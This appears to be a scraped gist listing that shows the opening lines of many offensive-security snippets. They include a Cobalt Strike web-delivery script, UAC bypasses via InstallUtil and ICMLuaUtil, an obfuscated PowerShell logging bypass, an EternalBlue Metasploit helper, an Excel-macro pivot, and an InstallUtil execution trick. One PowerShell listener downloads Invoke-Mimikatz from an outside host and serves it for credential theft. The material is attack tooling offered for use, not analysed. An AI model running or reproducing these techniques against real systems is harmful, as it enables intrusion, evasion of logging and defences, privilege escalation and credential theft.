This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python Stageless Scripted Web Delivery | |
| # setup our stageless Python Web Delivery attack | |
| sub setup_attack { | |
| local('%options $x86payload $x64payload $url $script'); | |
| %options = $3; | |
| # generate our stageless x86 payload | |
| artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
| yield; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ScriptBlock Logging Bypass | |
| # @cobbr_io | |
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # script to help move around with ms17-010 from Metasploit | |
| # Go to Attacks -> Eternal Blue | |
| # | |
| # target, listener, where to save .rc file | |
| sub generate_rc_file { | |
| local('$target $listener $where $handle $shellcode'); | |
| ($target, $listener, $where) = @_; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface ICMLuaUtil ICMLuaUtil; | |
| typedef struct ICMLuaUtilVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in ICMLuaUtil * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; No longer needed - embedded in script now | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall] | |
| CustomDestination=CustInstDestSectionAllUsers | |
| RunPreSetupCommands=RunPreSetupCommandsSection | |
| [RunPreSetupCommandsSection] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
| $Hso = New-Object Net.HttpListener | |
| $Hso.Prefixes.Add("http://+:8080/") | |
| $Hso.Start() | |
| While ($Hso.IsListening) { | |
| $HC = $Hso.GetContext() | |
| $HRes = $HC.Response | |
| $HRes.Headers.Add("Content-Type","text/plain") | |
| If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
| $Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ExcelMacroPivot{ | |
| <# | |
| .AUTHOR | |
| Matt Nelson (@enigma0x3) | |
| .SYNOPSIS | |
| Pivots to a remote host by using an Excel macro and Excel's COM object | |
| .PARAMETER Target | |
| Remote host to pivot to | |
| .PARAMETER RemoteDocumentPath | |
| Local path on the remote host where the payload resides |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs | |
| ===================================== USAGE ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll | |
| */ |